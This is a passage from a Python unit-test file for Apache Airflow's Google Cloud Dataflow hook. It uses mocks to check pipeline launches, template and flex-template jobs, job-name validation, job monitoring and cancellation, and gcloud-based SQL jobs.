expected_variables["region"] = DEFAULT_DATAFLOW_LOCATION
expected_variables['extra-package'] = ['a.whl', 'b.whl']
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_python_pipeline.assert_called_once_with(
variables=expected_variables,
py_file=PY_FILE,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_options=PY_OPTIONS,
py_requirements=py_requirements,
py_system_site_packages=False,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=DEFAULT_DATAFLOW_LOCATION
)
@parameterized.expand(
[
('python3',),
('python2',),
('python3',),
('python3.6',),
]
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_python_dataflow_with_custom_interpreter(
self, py_interpreter, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid
):
mock_beam_start_python_pipeline = self.dataflow_hook.beam_hook.start_python_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_python_dataflow(
job_name=JOB_NAME,
variables=DATAFLOW_VARIABLES_PY,
dataflow=PY_FILE,
py_options=PY_OPTIONS,
py_interpreter=py_interpreter,
py_requirements=None,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
expected_variables["job_name"] = job_name
expected_variables["region"] = DEFAULT_DATAFLOW_LOCATION
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_python_pipeline.assert_called_once_with(
variables=expected_variables,
py_file=PY_FILE,
py_interpreter=py_interpreter,
py_options=PY_OPTIONS,
py_requirements=None,
py_system_site_packages=False,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=DEFAULT_DATAFLOW_LOCATION
)
@parameterized.expand(
[
(['foo-bar'], False),
(['foo-bar'], True),
([], True),
]
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_python_dataflow_with_non_empty_py_requirements_and_without_system_packages(
self,
current_py_requirements,
current_py_system_site_packages,
mock_callback_on_job_id,
mock_dataflow_wait_for_done,
mock_uuid,
):
mock_beam_start_python_pipeline = self.dataflow_hook.beam_hook.start_python_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_python_dataflow(
job_name=JOB_NAME,
variables=DATAFLOW_VARIABLES_PY,
dataflow=PY_FILE,
py_options=PY_OPTIONS,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_requirements=current_py_requirements,
py_system_site_packages=current_py_system_site_packages,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
expected_variables["job_name"] = job_name
expected_variables["region"] = DEFAULT_DATAFLOW_LOCATION
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_python_pipeline.assert_called_once_with(
variables=expected_variables,
py_file=PY_FILE,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_options=PY_OPTIONS,
py_requirements=current_py_requirements,
py_system_site_packages=current_py_system_site_packages,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=DEFAULT_DATAFLOW_LOCATION
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
def test_start_python_dataflow_with_empty_py_requirements_and_without_system_packages(
self, mock_dataflow_wait_for_done, mock_uuid
):
self.dataflow_hook.beam_hook = BeamHook(runner="DataflowRunner")
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"), self.assertRaisesRegex(
AirflowException, "Invalid method invocation."
):
self.dataflow_hook.start_python_dataflow(
job_name=JOB_NAME,
variables=DATAFLOW_VARIABLES_PY,
dataflow=PY_FILE,
py_options=PY_OPTIONS,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_requirements=[],
on_new_job_id_callback=on_new_job_id_callback,
)
mock_dataflow_wait_for_done.assert_not_called()
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_java_dataflow(self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid):
mock_beam_start_java_pipeline = self.dataflow_hook.beam_hook.start_java_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_java_dataflow(
job_name=JOB_NAME,
variables=DATAFLOW_VARIABLES_JAVA,
jar=JAR_FILE,
job_class=JOB_CLASS,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_JAVA)
expected_variables["jobName"] = job_name
expected_variables["region"] = DEFAULT_DATAFLOW_LOCATION
expected_variables["labels"] = '{"foo":"bar"}'
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_java_pipeline.assert_called_once_with(
variables=expected_variables,
jar=JAR_FILE,
job_class=JOB_CLASS,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=DEFAULT_DATAFLOW_LOCATION, multiple_jobs=False
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_java_dataflow_with_multiple_values_in_variables(
self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid
):
mock_beam_start_java_pipeline = self.dataflow_hook.beam_hook.start_java_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
passed_variables: Dict[str, Any] = copy.deepcopy(DATAFLOW_VARIABLES_JAVA)
passed_variables['mock-option'] = ['a.whl', 'b.whl']
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_java_dataflow(
job_name=JOB_NAME,
variables=passed_variables,
jar=JAR_FILE,
job_class=JOB_CLASS,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(passed_variables)
expected_variables["jobName"] = job_name
expected_variables["region"] = DEFAULT_DATAFLOW_LOCATION
expected_variables["labels"] = '{"foo":"bar"}'
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_java_pipeline.assert_called_once_with(
variables=expected_variables,
jar=JAR_FILE,
job_class=JOB_CLASS,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=DEFAULT_DATAFLOW_LOCATION, multiple_jobs=False
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_java_dataflow_with_custom_region_as_variable(
self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid
):
mock_beam_start_java_pipeline = self.dataflow_hook.beam_hook.start_java_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
passed_variables: Dict[str, Any] = copy.deepcopy(DATAFLOW_VARIABLES_JAVA)
passed_variables['region'] = TEST_LOCATION
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_java_dataflow(
job_name=JOB_NAME,
variables=passed_variables,
jar=JAR_FILE,
job_class=JOB_CLASS,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_JAVA)
expected_variables["jobName"] = job_name
expected_variables["region"] = TEST_LOCATION
expected_variables["labels"] = '{"foo":"bar"}'
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_java_pipeline.assert_called_once_with(
variables=expected_variables,
jar=JAR_FILE,
job_class=JOB_CLASS,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=TEST_LOCATION, multiple_jobs=False
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_java_dataflow_with_custom_region_as_parameter(
self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid
):
mock_beam_start_java_pipeline = self.dataflow_hook.beam_hook.start_java_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_java_dataflow(
job_name=JOB_NAME,
variables=DATAFLOW_VARIABLES_JAVA,
jar=JAR_FILE,
job_class=JOB_CLASS,
on_new_job_id_callback=on_new_job_id_callback,
location=TEST_LOCATION,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_JAVA)
expected_variables["jobName"] = job_name
expected_variables["region"] = TEST_LOCATION
expected_variables["labels"] = '{"foo":"bar"}'
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_java_pipeline.assert_called_once_with(
variables=expected_variables,
jar=JAR_FILE,
job_class=JOB_CLASS,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=TEST_LOCATION, multiple_jobs=False
)
@parameterized.expand(
[
(JOB_NAME, JOB_NAME, False),
('test-example', 'test_example', False),
(f'test-dataflow-pipeline-{MOCK_UUID_PREFIX}', JOB_NAME, True),
(f'test-example-{MOCK_UUID_PREFIX}', 'test_example', True),
('df-job-1', 'df-job-1', False),
('df-job', 'df-job', False),
('dfjob', 'dfjob', False),
('dfjob1', 'dfjob1', False),
]
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'), return_value=MOCK_UUID)
def test_valid_dataflow_job_name(self, expected_result, job_name, append_job_name, mock_uuid4):
job_name = self.dataflow_hook.build_dataflow_job_name(
job_name=job_name, append_job_name=append_job_name
)
self.assertEqual(expected_result, job_name)
#
@parameterized.expand([("1dfjob@",), ("dfjob@",), ("df^jo",)])
def test_build_dataflow_job_name_with_invalid_value(self, job_name):
self.assertRaises(
ValueError, self.dataflow_hook.build_dataflow_job_name, job_name=job_name, append_job_name=False
)
#
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_get_job(self, mock_conn, mock_dataflowjob):
method_fetch_job_by_id = mock_dataflowjob.return_value.fetch_job_by_id
self.dataflow_hook.get_job(job_id=TEST_JOB_ID, project_id=TEST_PROJECT_ID, location=TEST_LOCATION)
mock_conn.assert_called_once()
mock_dataflowjob.assert_called_once_with(
dataflow=mock_conn.return_value,
project_number=TEST_PROJECT_ID,
location=TEST_LOCATION,
)
method_fetch_job_by_id.assert_called_once_with(TEST_JOB_ID)
#
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_fetch_job_metrics_by_id(self, mock_conn, mock_dataflowjob):
method_fetch_job_metrics_by_id = mock_dataflowjob.return_value.fetch_job_metrics_by_id
self.dataflow_hook.fetch_job_metrics_by_id(
job_id=TEST_JOB_ID, project_id=TEST_PROJECT_ID, location=TEST_LOCATION
)
mock_conn.assert_called_once()
mock_dataflowjob.assert_called_once_with(
dataflow=mock_conn.return_value,
project_number=TEST_PROJECT_ID,
location=TEST_LOCATION,
)
method_fetch_job_metrics_by_id.assert_called_once_with(TEST_JOB_ID)
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_fetch_job_metrics_by_id_controller(self, mock_conn):
method_get_metrics = (
mock_conn.return_value.projects.return_value.locations.return_value.jobs.return_value.getMetrics
)
self.dataflow_hook.fetch_job_metrics_by_id(
job_id=TEST_JOB_ID, project_id=TEST_PROJECT_ID, location=TEST_LOCATION
)
mock_conn.assert_called_once()
method_get_metrics.return_value.execute.assert_called_once_with(num_retries=0)
method_get_metrics.assert_called_once_with(
jobId=TEST_JOB_ID, projectId=TEST_PROJECT_ID, location=TEST_LOCATION
)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_fetch_job_messages_by_id(self, mock_conn, mock_dataflowjob):
method_fetch_job_messages_by_id = mock_dataflowjob.return_value.fetch_job_messages_by_id
self.dataflow_hook.fetch_job_messages_by_id(
job_id=TEST_JOB_ID, project_id=TEST_PROJECT_ID, location=TEST_LOCATION
)
mock_conn.assert_called_once()
mock_dataflowjob.assert_called_once_with(
dataflow=mock_conn.return_value,
project_number=TEST_PROJECT_ID,
location=TEST_LOCATION,
)
method_fetch_job_messages_by_id.assert_called_once_with(TEST_JOB_ID)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_fetch_job_autoscaling_events_by_id(self, mock_conn, mock_dataflowjob):
method_fetch_job_autoscaling_events_by_id = (
mock_dataflowjob.return_value.fetch_job_autoscaling_events_by_id
)
self.dataflow_hook.fetch_job_autoscaling_events_by_id(
job_id=TEST_JOB_ID, project_id=TEST_PROJECT_ID, location=TEST_LOCATION
)
mock_conn.assert_called_once()
mock_dataflowjob.assert_called_once_with(
dataflow=mock_conn.return_value,
project_number=TEST_PROJECT_ID,
location=TEST_LOCATION,
)
method_fetch_job_autoscaling_events_by_id.assert_called_once_with(TEST_JOB_ID)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_wait_for_done(self, mock_conn, mock_dataflowjob):
method_wait_for_done = mock_dataflowjob.return_value.wait_for_done
self.dataflow_hook.wait_for_done(
job_name="JOB_NAME",
project_id=TEST_PROJECT_ID,
job_id=TEST_JOB_ID,
location=TEST_LOCATION,
multiple_jobs=False,
)
mock_conn.assert_called_once()
mock_dataflowjob.assert_called_once_with(
dataflow=mock_conn.return_value,
project_number=TEST_PROJECT_ID,
name="JOB_NAME",
location=TEST_LOCATION,
poll_sleep=self.dataflow_hook.poll_sleep,
job_id=TEST_JOB_ID,
num_retries=self.dataflow_hook.num_retries,
multiple_jobs=False,
drain_pipeline=self.dataflow_hook.drain_pipeline,
cancel_timeout=self.dataflow_hook.cancel_timeout,
wait_until_finished=self.dataflow_hook.wait_until_finished,
)
method_wait_for_done.assert_called_once_with()
class TestDataflowTemplateHook(unittest.TestCase):
def setUp(self):
with mock.patch(BASE_STRING.format('GoogleBaseHook.__init__'), new=mock_init):
self.dataflow_hook = DataflowHook(gcp_conn_id='test')
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'), return_value=MOCK_UUID)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_start_template_dataflow(self, mock_conn, mock_controller, mock_uuid):
launch_method = (
mock_conn.return_value.projects.return_value.locations.return_value.templates.return_value.launch
)
launch_method.return_value.execute.return_value = {"job": {"id": TEST_JOB_ID}}
variables = {'zone': 'us-central1-f', 'tempLocation': 'gs://test/temp'}
self.dataflow_hook.start_template_dataflow(
job_name=JOB_NAME,
variables=copy.deepcopy(variables),
parameters=PARAMETERS,
dataflow_template=TEST_TEMPLATE,
project_id=TEST_PROJECT,
)
launch_method.assert_called_once_with(
body={
'jobName': f'test-dataflow-pipeline-{MOCK_UUID_PREFIX}',
'parameters': PARAMETERS,
'environment': variables,
},
gcsPath='gs://dataflow-templates/wordcount/template_file',
projectId=TEST_PROJECT,
location=DEFAULT_DATAFLOW_LOCATION,
)
mock_controller.assert_called_once_with(
dataflow=mock_conn.return_value,
job_id='test-job-id',
name=f'test-dataflow-pipeline-{MOCK_UUID_PREFIX}',
num_retries=5,
poll_sleep=10,
project_number=TEST_PROJECT,
location=DEFAULT_DATAFLOW_LOCATION,
drain_pipeline=False,
cancel_timeout=DEFAULT_CANCEL_TIMEOUT,
wait_until_finished=None,
)
mock_controller.return_value.wait_for_done.assert_called_once()
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'), return_value=MOCK_UUID)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_start_template_dataflow_with_custom_region_as_variable(
self, mock_conn, mock_controller, mock_uuid
):
launch_method = (
mock_conn.return_value.projects.return_value.locations.return_value.templates.return_value.launch
)
launch_method.return_value.execute.return_value = {"job": {"id": TEST_JOB_ID}}
self.dataflow_hook.start_template_dataflow(
job_name=JOB_NAME,
variables={'region': TEST_LOCATION},
parameters=PARAMETERS,
dataflow_template=TEST_TEMPLATE,
project_id=TEST_PROJECT,
)
launch_method.assert_called_once_with(
projectId=TEST_PROJECT,
location=TEST_LOCATION,
gcsPath=TEST_TEMPLATE,
body=mock.ANY,
)
mock_controller.assert_called_once_with(
dataflow=mock_conn.return_value,
job_id=TEST_JOB_ID,
name=UNIQUE_JOB_NAME,
num_retries=5,
poll_sleep=10,
project_number=TEST_PROJECT,
location=TEST_LOCATION,
drain_pipeline=False,
cancel_timeout=DEFAULT_CANCEL_TIMEOUT,
wait_until_finished=None,
)
mock_controller.return_value.wait_for_done.assert_called_once()
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'), return_value=MOCK_UUID)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_start_template_dataflow_with_custom_region_as_parameter(
self, mock_conn, mock_controller, mock_uuid
):
launch_method = (
mock_conn.return_value.projects.return_value.locations.return_value.templates.return_value.launch
)
launch_method.return_value.execute.return_value = {"job": {"id": TEST_JOB_ID}}
self.dataflow_hook.start_template_dataflow(
job_name=JOB_NAME,
variables={},
parameters=PARAMETERS,
dataflow_template=TEST_TEMPLATE,
location=TEST_LOCATION,
project_id=TEST_PROJECT,
)
launch_method.assert_called_once_with(
body={'jobName': UNIQUE_JOB_NAME, 'parameters': PARAMETERS, 'environment': {}},
gcsPath='gs://dataflow-templates/wordcount/template_file',
projectId=TEST_PROJECT,
location=TEST_LOCATION,
)
mock_controller.assert_called_once_with(
dataflow=mock_conn.return_value,
job_id=TEST_JOB_ID,
name=UNIQUE_JOB_NAME,
num_retries=5,
poll_sleep=10,
project_number=TEST_PROJECT,
location=TEST_LOCATION,
drain_pipeline=False,
cancel_timeout=DEFAULT_CANCEL_TIMEOUT,
wait_until_finished=None,
)
mock_controller.return_value.wait_for_done.assert_called_once()
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'), return_value=MOCK_UUID)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_start_template_dataflow_with_runtime_env(self, mock_conn, mock_dataflowjob, mock_uuid):
options_with_runtime_env = copy.deepcopy(RUNTIME_ENV)
dataflowjob_instance = mock_dataflowjob.return_value
dataflowjob_instance.wait_for_done.return_value = None
# fmt: off
method = (mock_conn.return_value
.projects.return_value
.locations.return_value
.templates.return_value
.launch)
# fmt: on
method.return_value.execute.return_value = {'job': {'id': TEST_JOB_ID}}
self.dataflow_hook.start_template_dataflow(
job_name=JOB_NAME,
variables=options_with_runtime_env,
parameters=PARAMETERS,
dataflow_template=TEST_TEMPLATE,
project_id=TEST_PROJECT,
environment={"numWorkers": 17},
)
body = {"jobName": mock.ANY, "parameters": PARAMETERS, "environment": RUNTIME_ENV}
method.assert_called_once_with(
projectId=TEST_PROJECT,
location=DEFAULT_DATAFLOW_LOCATION,
gcsPath=TEST_TEMPLATE,
body=body,
)
mock_dataflowjob.assert_called_once_with(
dataflow=mock_conn.return_value,
job_id=TEST_JOB_ID,
location=DEFAULT_DATAFLOW_LOCATION,
name=f'test-dataflow-pipeline-{MOCK_UUID_PREFIX}',
num_retries=5,
poll_sleep=10,
project_number=TEST_PROJECT,
drain_pipeline=False,
cancel_timeout=DEFAULT_CANCEL_TIMEOUT,
wait_until_finished=None,
)
mock_uuid.assert_called_once_with()
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'), return_value=MOCK_UUID)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_start_template_dataflow_update_runtime_env(self, mock_conn, mock_dataflowjob, mock_uuid):
options_with_runtime_env = copy.deepcopy(RUNTIME_ENV)
del options_with_runtime_env["numWorkers"]
runtime_env = {"numWorkers": 17}
expected_runtime_env = copy.deepcopy(RUNTIME_ENV)
expected_runtime_env.update(runtime_env)
dataflowjob_instance = mock_dataflowjob.return_value
dataflowjob_instance.wait_for_done.return_value = None
# fmt: off
method = (mock_conn.return_value
.projects.return_value
.locations.return_value
.templates.return_value
.launch)
# fmt: on
method.return_value.execute.return_value = {'job': {'id': TEST_JOB_ID}}
self.dataflow_hook.start_template_dataflow(
job_name=JOB_NAME,
variables=options_with_runtime_env,
parameters=PARAMETERS,
dataflow_template=TEST_TEMPLATE,
project_id=TEST_PROJECT,
environment=runtime_env,
)
body = {"jobName": mock.ANY, "parameters": PARAMETERS, "environment": expected_runtime_env}
method.assert_called_once_with(
projectId=TEST_PROJECT,
location=DEFAULT_DATAFLOW_LOCATION,
gcsPath=TEST_TEMPLATE,
body=body,
)
mock_dataflowjob.assert_called_once_with(
dataflow=mock_conn.return_value,
job_id=TEST_JOB_ID,
location=DEFAULT_DATAFLOW_LOCATION,
name=f'test-dataflow-pipeline-{MOCK_UUID_PREFIX}',
num_retries=5,
poll_sleep=10,
project_number=TEST_PROJECT,
drain_pipeline=False,
cancel_timeout=DEFAULT_CANCEL_TIMEOUT,
wait_until_finished=None,
)
mock_uuid.assert_called_once_with()
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_start_flex_template(self, mock_conn, mock_controller):
mock_locations = mock_conn.return_value.projects.return_value.locations
launch_method = mock_locations.return_value.flexTemplates.return_value.launch
launch_method.return_value.execute.return_value = {"job": {"id": TEST_JOB_ID}}
mock_controller.return_value.get_jobs.return_value = [{"id": TEST_JOB_ID}]
on_new_job_id_callback = mock.MagicMock()
result = self.dataflow_hook.start_flex_template(
body={"launchParameter": TEST_FLEX_PARAMETERS},
location=TEST_LOCATION,
project_id=TEST_PROJECT_ID,
on_new_job_id_callback=on_new_job_id_callback,
)
on_new_job_id_callback.assert_called_once_with(TEST_JOB_ID)
launch_method.assert_called_once_with(
projectId='test-project-id',
body={'launchParameter': TEST_FLEX_PARAMETERS},
location=TEST_LOCATION,
)
mock_controller.assert_called_once_with(
dataflow=mock_conn.return_value,
project_number=TEST_PROJECT_ID,
job_id=TEST_JOB_ID,
location=TEST_LOCATION,
poll_sleep=self.dataflow_hook.poll_sleep,
num_retries=self.dataflow_hook.num_retries,
cancel_timeout=DEFAULT_CANCEL_TIMEOUT,
wait_until_finished=self.dataflow_hook.wait_until_finished,
)
mock_controller.return_value.get_jobs.wait_for_done.assrt_called_once_with()
mock_controller.return_value.get_jobs.assrt_called_once_with()
assert result == {"id": TEST_JOB_ID}
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_cancel_job(self, mock_get_conn, jobs_controller):
self.dataflow_hook.cancel_job(
job_name=UNIQUE_JOB_NAME, job_id=TEST_JOB_ID, project_id=TEST_PROJECT, location=TEST_LOCATION
)
jobs_controller.assert_called_once_with(
dataflow=mock_get_conn.return_value,
job_id=TEST_JOB_ID,
location=TEST_LOCATION,
name=UNIQUE_JOB_NAME,
poll_sleep=10,
project_number=TEST_PROJECT,
num_retries=5,
drain_pipeline=False,
cancel_timeout=DEFAULT_CANCEL_TIMEOUT,
)
jobs_controller.cancel()
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.provide_authorized_gcloud'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
@mock.patch(DATAFLOW_STRING.format('subprocess.run'))
def test_start_sql_job_failed_to_run(
self, mock_run, mock_get_conn, mock_provide_authorized_gcloud, mock_controller
):
test_job = {'id': "TEST_JOB_ID"}
mock_controller.return_value.get_jobs.return_value = [test_job]
mock_run.return_value = mock.MagicMock(
stdout=f"{TEST_JOB_ID}\n".encode(), stderr=f"{TEST_JOB_ID}\n".encode(), returncode=0
)
on_new_job_id_callback = mock.MagicMock()
result = self.dataflow_hook.start_sql_job(
job_name=TEST_SQL_JOB_NAME,
query=TEST_SQL_QUERY,
options=TEST_SQL_OPTIONS,
location=TEST_LOCATION,
project_id=TEST_PROJECT,
on_new_job_id_callback=on_new_job_id_callback,
)
mock_run.assert_called_once_with(
[
'gcloud',
'dataflow',
'sql',
'query',
TEST_SQL_QUERY,
'--project=test-project',
'--format=value(job.id)',
'--job-name=test-sql-job-name',
'--region=custom-location',
'--bigquery-project=test-project',
'--bigquery-dataset=test-dataset',
'--bigquery-table=beam_output',
'--bigquery-write-disposition=write-truncate',
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
mock_controller.assert_called_once_with(
dataflow=mock_get_conn.return_value,
job_id=TEST_JOB_ID,
location=TEST_LOCATION,
poll_sleep=10,
project_number=TEST_PROJECT,
num_retries=5,
drain_pipeline=False,
wait_until_finished=None,
)
mock_controller.return_value.wait_for_done.assert_called_once()
assert result == test_job
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.provide_authorized_gcloud'))
@mock.patch(DATAFLOW_STRING.format('subprocess.run'))
def test_start_sql_job(self, mock_run, mock_provide_authorized_gcloud, mock_get_conn):
mock_run.return_value = mock.MagicMock(
stdout=f"{TEST_JOB_ID}\n".encode(), stderr=f"{TEST_JOB_ID}\n".encode(), returncode=1
)
with pytest.raises(AirflowException):
self.dataflow_hook.start_sql_job(
job_name=TEST_SQL_JOB_NAME,
query=TEST_SQL_QUERY,
options=TEST_SQL_OPTIONS,
location=TEST_LOCATION,
project_id=TEST_PROJECT,
on_new_job_id_callback=mock.MagicMock(),
)
class TestDataflowJob(unittest.TestCase):
def setUp(self):
self.mock_dataflow = MagicMock()
def test_dataflow_job_init_with_job_id(self):
mock_jobs = MagicMock()
self.mock_dataflow.projects.return_value.locations.return_value.jobs.return_value = mock_jobs
_DataflowJobsController(
self.mock_dataflow, TEST_PROJECT, TEST_LOCATION, 10, UNIQUE_JOB_NAME, TEST_JOB_ID
).get_jobs()
mock_jobs.get.assert_called_once_with(
projectId=TEST_PROJECT, location=TEST_LOCATION, jobId=TEST_JOB_ID
)
def test_dataflow_job_init_without_job_id(self):
job = {"id": TEST_JOB_ID, "name": UNIQUE_JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_DONE}
mock_list = self.mock_dataflow.projects.return_value.locations.return_value.jobs.return_value.list
(mock_list.return_value.execute.return_value) = {'jobs': [job]}
# fmt: off
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list_next.return_value
) = None
# fmt: on
_DataflowJobsController(
self.mock_dataflow, TEST_PROJECT, TEST_LOCATION, 10, UNIQUE_JOB_NAME
).get_jobs()
mock_list.assert_called_once_with(projectId=TEST_PROJECT, location=TEST_LOCATION)
def test_dataflow_job_wait_for_multiple_jobs(self):
job = {
"id": TEST_JOB_ID,
"name": UNIQUE_JOB_NAME,
"type": DataflowJobType.JOB_TYPE_BATCH,
"currentState": DataflowJobStatus.JOB_STATE_DONE,
}
# fmt: off
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list.return_value.
execute.return_value
) = {
"jobs": [job, job]
}
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list_next.return_value
) = None
# fmt: on
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name=UNIQUE_JOB_NAME,
location=TEST_LOCATION,
poll_sleep=10,
job_id=TEST_JOB_ID,
num_retries=20,
multiple_jobs=True,
)
dataflow_job.wait_for_done()
# fmt: off
self.mock_dataflow.projects.return_value.locations.return_value.jobs.return_value.\
